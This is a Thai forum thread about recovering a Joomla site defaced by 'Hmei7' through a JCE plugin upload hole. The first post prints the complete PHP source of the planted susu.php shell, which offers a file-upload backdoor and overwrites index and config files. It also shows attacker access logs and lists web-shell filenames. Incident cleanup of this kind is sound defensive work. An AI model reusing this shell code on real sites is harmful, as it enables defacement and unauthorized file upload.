ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comพัฒนาเว็บไซต์CMS & Free Scriptวิธีการแก้ไข Joomla ที่โดน "hacked by Hmei7"
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: วิธีการแก้ไข Joomla ที่โดน "hacked by Hmei7"  (อ่าน 6678 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
consensus
สมุนแก๊งเสียว
*

พลังน้ำใจ: 259
ออฟไลน์ ออฟไลน์

กระทู้: 904



ดูรายละเอียด
« เมื่อ: 24 เมษายน 2013, 22:06:07 »

เนื่องจากตัวผมเองเป็นคนที่ชอบใจงาน Joomla เนื่องจากใช้งานง่าย ติดตั้งไม่ลำบาก แต่มีข้อเสียที่มีคนชอบบ่นอยู่บ่อยๆก็คือ โดนเจาะระบบ หรือ hack ได้ง่าย โดยอยู่มาวันนึงผมก็โดนจนได้ที่ผมโดน คือ เปิดเข้า website มาก็มีข้อความสั้นๆคือ "hacked by Hmei7" ดังรูปตัวอย่าง



ผมตกใจมากก็เลยหาวิธีแก้ไข โดยการแก้ไขผมทำตามต่อไปนี้ครับ
อ้างถึง


โดยรูปส่วนใหญ่ผมขอใช้ของlinkข้างต้นเค้าละกัน แต่ขอเพิ่มเติมที่ผมแก้ไขเพิ่มเข้าไปด้วยนะครับ โดยวิธีการมีดังต่อไปนี้ครับ

ตำแหน่งที่โดยโจมตีหลักๆมีดังต่อไปนี้ครับ

/images/stories/susu.php
/images/x.txt
/tmp/x.txt
/.htaccess
/configuration.php
/index.php
/index.htm
/index.html

แต่ชื่อ file ต่างๆอาจถูกเปลี่ยนแปลงชื่อได้โดย hacker นะครับ

วิธีแก้ไขเบื้องต้นเพื่อให้ joomla ของท่านกลับมาใช้งานได้

1. ลบ susu.php(อาจมีการเปลี่ยนแปลงได้นะครับ) และ x.txt ออก
2. index.php, index.html, index.html และ .htaccess ถ้ามีการเปลี่ยนแปลงให้ restore ข้อมูลที่เคย backup ไว้หรือนำตัว install ของ joomla มาทับก็ได้
3. configuration.php ถ้าโดนเปลี่ยนแปลงข้อมูลให้ลบทิ้งไปก่อน

file แปลกปลอมอื่นที่พบ ให้ลบออกทันที เช่น

m.txt
000-aaz.gif
0day.php
c99.php
config.root
css.php
en-gt.php
index.old.php
lib.php
maroc.php
r57.php
rc.php
story.php
tar.tmp
toy.php
web1.php
wh.php
Wos.php
xxu.php
xxx.php
zzzzx.php


สำหรับ configuration.php ถือว่าเป็น file ที่สำคัญมากเเพราะมีการเก็บพวก config ต่างๆไว้ รวมทั้ง username และ password ที่สำคัญไว้ สำหรับใครที่ไม่ได้ backup ข้อมูลไว้เลย จะมีข้อมูลเบื้องต้นดังต่อไปนี้ครับ

โค๊ด:
<?php
class JConfig {
    var 
$offline = &#39;0&#39;;
    
var $editor = &#39;tinymce&#39;;
    
var $list_limit = &#39;20&#39;;
    
var $helpurl = &#39;http://help.joomla.org&#39;;
    
var $debug = &#39;0&#39;;
    
var $debug_lang = &#39;0&#39;;
    
var $sef = &#39;1&#39;;
    
var $sef_rewrite = &#39;0&#39;;
    
var $sef_suffix = &#39;0&#39;;
    
var $feed_limit = &#39;10&#39;;
    
var $feed_email = &#39;author&#39;;
    
var $secret = &#39;xxxxxxxxxxxxxxxx&#39;;
    
var $gzip = &#39;0&#39;;
    
var $error_reporting = &#39;-1&#39;;
    
var $xmlrpc_server = &#39;0&#39;;
    
var $log_path = &#39;/var/www/logs&#39;;
    
var $tmp_path = &#39;/var/www/tmp&#39;;
    
var $live_site = &#39;&#39;;
    
var $force_ssl = &#39;0&#39;;
    
var $offset = &#39;-7&#39;;
    
var $caching = &#39;0&#39;;
    
var $cachetime = &#39;15&#39;;
    
var $cache_handler = &#39;file&#39;;
    
var $memcache_settings = array();
    var 
$ftp_enable = &#39;0&#39;;
    
var $ftp_host = &#39;127.0.0.1&#39;;
    
var $ftp_port = &#39;21&#39;;
    
var $ftp_user = &#39;&#39;;
    
var $ftp_pass = &#39;&#39;;
    
var $ftp_root = &#39;&#39;;
    
var $dbtype = &#39;mysqli&#39;;
    
var $host = &#39;localhost&#39;;
    
var $user = &#39;dbuser&#39;;
    
var $db = &#39;dbname&#39;;
    
var $dbprefix = &#39;jos_&#39;;
    
var $mailer = &#39;smtp&#39;;
    
var $mailfrom = &#39;noreply@mailfrom.com&#39;;
    
var $fromname = &#39;Noreply Name&#39;;
    
var $sendmail = &#39;/usr/sbin/sendmail&#39;;
    
var $smtpauth = &#39;0&#39;;
    
var $smtpsecure = &#39;none&#39;;
    
var $smtpport = &#39;25&#39;;
    
var $smtpuser = &#39;&#39;;
    
var $smtppass = &#39;&#39;;
    
var $smtphost = &#39;smtp.smtphost.com&#39;;
    
var $MetaAuthor = &#39;1&#39;;
    
var $MetaTitle = &#39;1&#39;;
    
var $lifetime = &#39;15&#39;;
    
var $session_handler = &#39;database&#39;;
    
var $password = &#39;dbpassword&#39;;
    
var $sitename = &#39;Sitename&#39;;
    
var $MetaDesc = &#39;Joomla! - the dynamic portal engine and content management system&#39;;
    
var $MetaKeys = &#39;&#39;;
    
var $offline_message = &#39;This site is down for maintenance. Please check back again soon.&#39;;
}
?>

ตัวแปลต่างๆที่สำคัญที่ต้องแก้ไขก่อนเพื่อให้ Joomla เรากับมาใช้งานได้ คือ

$secret –  จะเป็นตัวเลข random ทั้งตัวอักษรเล็ก ใหญ่และตัวเลข
$log_path – path สำหรับ log.
$tmp_path – path สำหรับ tmp
$user – database username.
$db – database name.
$password – database password.

หลังจากตั้งค่าต่างๆพวกนี้แล้ว Joomla เราน่าจะสามารถกลับมาทำงานได้ครับ

***มีอีกเรื่องที่ต้องรีบทำการแก้ไขคือ ในส่วนของ permission ของ configuration.php ที่โดน hack จะตั้งเป็น 777 ให้เรารีบแก้ไขเป็น 644

เราลองมาดู susu.php กัน

โค๊ด:
GIF89;<br><br>
<?php
if ( isset($_GET[&#39;versi&#39;]) )
{
    
vers();
exit;
}
 
 
if ( isset(
$_GET[&#39;indonesia&#39;]) )
{
    echo 
"silahkan masuk\n\n";
    echo &
#39;<b>Indonesian people is here..<br><br>&#39;.&#39;&#39;.&#39;<br></b>&#39;;
    
echo &#39;<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">&#39;;
    
echo &#39;<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>&#39;;
    
if( $_POST[&#39;_upl&#39;] == "Upload" ) {
        
if(@copy($_FILES[&#39;file&#39;][&#39;tmp_name&#39;], $_FILES[&#39;file&#39;][&#39;name&#39;])) { echo &#39;<b>Upload Success !!!</b><br><br>&#39;; }
        
else { echo &#39;<b>Upload Gagal !!!</b><br><br>&#39;; }
    
}
exit;
}
 
if ( isset(
$_GET[&#39;yaiyalah&#39;]) )
{
    
$tmp=strrev(&#39;7iemH yb dekcah&#39;);
    
$nama=&#39;x.txt&#39;;
//----------
    
$piro=letaksekarang();
    
$piro=str_replace(&#39;http://&#39;,&#39;&#39;,$piro);
    
$arr=explode("/",$piro);
    
$nnn=count($arr);
    
$nnn=$nnn-1//jml aktual fold
 
    
chdir(&#39;..&#39;);chdir(&#39;..&#39;);tulisi($nama,$tmp); //tulis now
    
$nnn=$nnn-2;
 
    if (
$nnn>0)
    {
        for ( 
$counter 1$counter <= $nnn$counter += 1)
        {
             
            
chdir(&#39;..&#39;);
            
tulisi($nama,$tmp); //menulis di ujung
        
}
    }
 
//----------
     
    
echo $tmp;
    echo &
#39;[jeneng]&#39;;
    
vers();
    echo &
#39;[/jeneng]&#39;;
    
exit;
}
 
echo &
#39;cari siapa ya?..&#39;;exit;
echo &#39;Hmei7&#39;;
 
function letaksekarang() {
 
$pageURL = &#39;http&#39;;
 
if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
 
$pageURL .= "://";
 if (
$_SERVER["SERVER_PORT"] != "80") {
  
$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
 } else {
  
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
 }
$pageURL=left($pageURL,strlen($pageURL)-strpos(strrev($pageURL),"/")-1);
 
$pageURL=str_replace("/".basename(__FILE__), ""$pageURL);
 return 
$pageURL;
}
 
function 
left($string,$chars)
{
    
$vright substr(strrev($string), strlen($string)-$chars,$chars);
    return 
strrev($vright);
    
}
 
function 
vers()
{
    eval(
strrev(";)(emanu_php ohce"));
    echo &
#39; ===> &#39;.getcwd();
    
echo &#39; ===> &#39;.letaksekarang();
}
 
function 
tulisi($nama,$tmp)
{
    if (
is_writable(getcwd()))  
    {
        
$fff fopen($nama, &#39;w&#39;);
        
fwrite($fff$tmp);
        
fclose($fff);
    }else
    {
>>>        
$fff fopen(&#39;configuration.php&#39;, &#39;w&#39;);
        
fwrite($fff$tmp.&#39;<?php exit;?>
');
        fclose($fff);
 
>>>        $fff = fopen('index.php', 'w');
        fwrite($fff, $tmp.'<?php exit;?>');
        fclose($fff);
 
>>>        $fff = fopen('index.htm', 'w');
        fwrite($fff, $tmp.'<?php exit;?>');
        fclose($fff);
 
>>>        $fff = fopen('index.html', 'w');
        fwrite($fff, $tmp.'<?php exit;?>');
        fclose($fff);
    }
     
 
>>>    $fff = fopen('./tmp/'.$nama, 'w');
    fwrite($fff, $tmp);
    fclose($fff);
 
>>>    $fff = fopen('./images/'.$nama, 'w');
    fwrite($fff, $tmp);
    fclose($fff);
}
 
?>

จะได้ว่ามีส่วนไหนบ้างที่มีการเข้าไป hack ผมจะทำเครื่องหมาย">>>"ไว้ให้นะครับ เพราะอาจมีการแก้ไขโดย hacker หรือ อาจจะไม่เหมือนกันนะครับ

ต่อมาเรามาดู log เพิ่มเติมกันหน่อยนะครับ มีดังนี้ครับ

ส่วนแรก
โค๊ด:
114.79.1.91 - - [03/Jan/2013:01:35:19 -0700] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 23168 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
114.79.1.91 - - [03/Jan/2013:01:35:22 -0700] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.0" 200 69 "-" "BOT/0.1 (indonesian defacer)"
114.79.1.91 - - [03/Jan/2013:01:35:23 -0700] "GET /images/stories/susu.gif HTTP/1.1" 200 2722 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
114.79.1.91 - - [03/Jan/2013:01:35:24 -0700] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.0" 200 36 "-" "BOT/0.1 (indonesian defacer)"
114.79.1.91 - - [03/Jan/2013:01:35:25 -0700] "GET /images/stories/susu.php?yaiyalah HTTP/1.1" 200 204 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
114.79.1.91 - - [03/Jan/2013:01:35:25 -0700] "GET /x.txt HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
114.79.1.91 - - [03/Jan/2013:01:35:26 -0700] "GET / HTTP/1.1" 200 15 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

อีกส่วนนึง
โค๊ด:
95.0.224.148 - - [05/Jan/2013:02:08:32 -0700] "GET /images/stories/susu.php?indonesia HTTP/1.1" 404 302 "-" "Mozilla/5.0"
95.0.224.148 - - [05/Jan/2013:06:52:03 -0700] "GET /images/stories/xxx.php HTTP/1.1" 404 301 "-" "Mozilla/5.0"
95.0.224.148 - - [05/Jan/2013:06:52:04 -0700] "GET /images/stories/xxu.php HTTP/1.1" 404 301 "-" "Mozilla/5.0"
95.0.224.148 - - [05/Jan/2013:06:52:05 -0700] "GET /images/stories/0day.php HTTP/1.1" 404 302 "-" "Mozilla/5.0"
95.0.224.148 - - [05/Jan/2013:16:42:59 -0700] "GET /images/stories/story.php?p1=phpinfo(); HTTP/1.1" 404 303 "-" "Mozilla/5.0"
95.0.224.148 - - [05/Jan/2013:16:42:59 -0700] "GET /images/stories/0day.php HTTP/1.1" 404 302 "-" "Mozilla/5.0"
95.0.224.148 - - [06/Jan/2013:01:01:06 -0700] "GET /images/stories/maroc.php?oujda-maroc=1 HTTP/1.1" 404 303 "-" "Mozilla/5.0"
95.0.224.148 - - [06/Jan/2013:01:01:07 -0700] "GET /images/stories/web1.php HTTP/1.1" 404 302 "-" "Mozilla/5.0"
95.0.224.148 - - [06/Jan/2013:01:01:07 -0700] "GET /images/stories/Wos.php HTTP/1.1" 404 301 "-" "Mozilla/5.0"
95.0.224.148 - - [06/Jan/2013:01:01:08 -0700] "GET /images/stories/c99.php HTTP/1.1" 404 301 "-" "Mozilla/5.0"
95.0.224.148 - - [06/Jan/2013:01:01:09 -0700] "GET /images/stories/r57.php HTTP/1.1" 404 301 "-" "Mozilla/5.0"

ในส่วนแรกเราจะเห็นได้เลยว่ามันเข้ามาทาง JCE plugin
ในส่วนต่อมาจะเป็นการเรียก susu.php

วิธีการป้องกัน
1. update plugin JCE ให้เป็น version ล่าสุด
2. update extension อื่นๆให้เป็น version ล่าสุด
3. configuration.php ให้ตั้ง permission เป็น 644 file อื่นๆ อาจจะตั้งเป็น 755
4. block ip 114.80.0.0 และ 95.0.0.0
โดนให้เพิ่มใน .htaccess ดังต่อไปนี้

Deny from 114.79
Deny from 95

เพื่อความแน่ใจเนื่องจากต้นทาง hack น่าจะมาจาก indonesia เราเลย block ประเทศมันไปเลยจะดีกว่าโดย

1. เข้าไปที่
อ้างถึง

2. เลือกประเทศที่เราต้องการจะ block ในที่นี้ คือ indonesia
3. จากนั้นเลือก .htaccess Deny
4. จะได้ code มาเราก็เอาไปใส่ใน .htaccess

เท่านี้ก็สามารถป้องกันเบื้องต้นได้พอสมควรละครับ

ระหว่างนี้ก็คอยเฝ้าระวังคอยดูว่าโดนเจาะเข้ามาอีกไหมนะครับผม

บทความนี้คงมีประโยชน์ไม่มากก็น้อยนะครับ

"ลงมือทำ"
by consensus


โพสอื่นๆที่น่าสนใจ
- ขอแชร์ 1 ในเทคนิคการขายของ amazon
http://www.thaiseoboard.com/index.php/topic,256405.0.html
-วิธีป้องกัน Spam webboard หรือ comment ต่างๆ
http://www.thaiseoboard.com/index.php/topic,287058.0.html
- มารู้จักหลุมทรายGoogle (google sandbox) และวิธีแก้ไขจากประสบการณ์จริงกันครับ
http://www.thaiseoboard.com/index.php/topic,257350.0.html
- การใช้งาน SEO doctor ครับ สำหรับการตรวจ on page ครับ
http://www.thaiseoboard.com/index.php/topic,256566.0.html
« แก้ไขครั้งสุดท้าย: 24 เมษายน 2013, 23:24:41 โดย consensus » บันทึกการเข้า

ITboy2555
ก๊วนเสียว
*

พลังน้ำใจ: 24
ออฟไลน์ ออฟไลน์

กระทู้: 437



ดูรายละเอียด
« ตอบ #1 เมื่อ: 24 เมษายน 2013, 22:42:13 »

ขอบคุณครับ
 สงสัย 000-aaz.gif เป็นไฟล์ภาพ แฮกเกอร์สามารถฝังไวรัสได้ด้วยเหรอครับ  wanwan017
บันทึกการเข้า
consensus
สมุนแก๊งเสียว
*

พลังน้ำใจ: 259
ออฟไลน์ ออฟไลน์

กระทู้: 904



ดูรายละเอียด
« ตอบ #2 เมื่อ: 24 เมษายน 2013, 23:00:25 »

ขอบคุณครับ
 สงสัย 000-aaz.gif เป็นไฟล์ภาพ แฮกเกอร์สามารถฝังไวรัสได้ด้วยเหรอครับ  wanwan017

ต้องเข้าใจก่อนนะครับ ว่า .gif และ .jpg คือ การบีบอัดข้อมูลรูป (compressed graphical information)

ซึ่งแน่นอนว่า ถ้าถามว่ามีการฝัง virus มาได้ไหม แน่นอนครับมีครับ วิธีการนี้เรียกว่า steganography ครับผม

แต่ผมก็ไม่ได้รู้ว่า .gif ที่ hacker เอาเข้ามาคงไม่ปลอดภัยแน่ๆเลยแนะนำให้ลบไว้ก่อนนะครับ
บันทึกการเข้า

nookikza
ก๊วนเสียว
*

พลังน้ำใจ: 20
ออฟไลน์ ออฟไลน์

กระทู้: 354



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 25 เมษายน 2013, 09:04:58 »

เยี่ยมค่ะ +1 ให้ไปเลยทั้งใจ  Embarrassed Embarrassed
บันทึกการเข้า

รับทำเว็บร้านค้า ❀ สไตล์เกาหลี  ★   น่ารักๆชิคๆ ~*
► Graphic Design ☆  รับทำเว็บ ออกแบบกราฟฟิก น่ารักชิคๆ ราคาเบาๆ ::
ballentertain
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 95
ออฟไลน์ ออฟไลน์

กระทู้: 1,246



ดูรายละเอียด
« ตอบ #4 เมื่อ: 25 เมษายน 2013, 09:40:44 »

ขอบคุณมากเลยครับ ป้องกันได้มากเลยทีเดียวครับ
บันทึกการเข้า

pom_kkk
ก๊วนเสียว
*

พลังน้ำใจ: 6
ออฟไลน์ ออฟไลน์

กระทู้: 201



ดูรายละเอียด เว็บไซต์
« ตอบ #5 เมื่อ: 25 เมษายน 2013, 10:10:12 »

ขอบคุณครับ wanwan017
บันทึกการเข้า

nanoman
คนรักเสียว
*

พลังน้ำใจ: 13
ออฟไลน์ ออฟไลน์

กระทู้: 128



ดูรายละเอียด เว็บไซต์
« ตอบ #6 เมื่อ: 25 เมษายน 2013, 10:35:39 »

ขอบคุณครับ.  wanwan017
บันทึกการเข้า

minipure
คนรักเสียว
*

พลังน้ำใจ: 4
ออฟไลน์ ออฟไลน์

กระทู้: 145



ดูรายละเอียด เว็บไซต์
« ตอบ #7 เมื่อ: 25 เมษายน 2013, 14:38:02 »

เยี่ยมมากครับว่าที่ ดร. ^^
บันทึกการเข้า

กลับมาเริ่มใหม่หลังจากทิ้งไปเป็นปี
iak1
บุคคลทั่วไป
« ตอบ #8 เมื่อ: 25 เมษายน 2013, 15:42:28 »






ช่องโหว่ JCE Joomla Extension Remote File Upload

http://www.bugreport.ir/78/exploit.htm

ตามที่ จขกท. บอกครับ  เข้าจาก JCE plugin แล้วก็ ได้ Shell php เลย

วิธีการแก้ไข ให้ลบ JCE plugin นั้นออกไปหรือ เลือกใช้เวอร์ชั่นอื่นครับ

และอย่าลืมตรวจสอบ Exploit ก่อนติดตั้ง ในคราวหลัง

http://basic-hack.blogspot.com...013/03/exploit-cms-plugin.html




« แก้ไขครั้งสุดท้าย: 25 เมษายน 2013, 15:52:48 โดย iak1 » บันทึกการเข้า
iak1
บุคคลทั่วไป
« ตอบ #9 เมื่อ: 25 เมษายน 2013, 15:49:39 »

ขอบคุณครับ
 สงสัย 000-aaz.gif เป็นไฟล์ภาพ แฮกเกอร์สามารถฝังไวรัสได้ด้วยเหรอครับ  wanwan017


ไม่ใช่การฝัง virus แต่ เป็นการแก้ไข http headder
ดูจากใน Exploit

 /* Packet 3 --> Change Extension from .gif to .php */
« แก้ไขครั้งสุดท้าย: 25 เมษายน 2013, 15:50:12 โดย iak1 » บันทึกการเข้า
consensus
สมุนแก๊งเสียว
*

พลังน้ำใจ: 259
ออฟไลน์ ออฟไลน์

กระทู้: 904



ดูรายละเอียด
« ตอบ #10 เมื่อ: 25 เมษายน 2013, 22:13:59 »






ช่องโหว่ JCE Joomla Extension Remote File Upload

http://www.bugreport.ir/78/exploit.htm

ตามที่ จขกท. บอกครับ  เข้าจาก JCE plugin แล้วก็ ได้ Shell php เลย

วิธีการแก้ไข ให้ลบ JCE plugin นั้นออกไปหรือ เลือกใช้เวอร์ชั่นอื่นครับ

และอย่าลืมตรวจสอบ Exploit ก่อนติดตั้ง ในคราวหลัง

http://basic-hack.blogspot.com...013/03/exploit-cms-plugin.html

ขอบคุณมากครับ

ขอบคุณครับ


 สงสัย 000-aaz.gif เป็นไฟล์ภาพ แฮกเกอร์สามารถฝังไวรัสได้ด้วยเหรอครับ  wanwan017



ไม่ใช่การฝัง virus แต่ เป็นการแก้ไข http headder
ดูจากใน Exploit

 /* Packet 3 --> Change Extension from .gif to .php */

เลยใช่ครับผม
บันทึกการเข้า

hatyaiwebdesign
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 60
ออฟไลน์ ออฟไลน์

กระทู้: 1,108



ดูรายละเอียด
« ตอบ #11 เมื่อ: 25 เมษายน 2013, 22:43:56 »

ขอบคุณครับ
บันทึกการเข้า

หน้า: [1]   ขึ้นบน
พิมพ์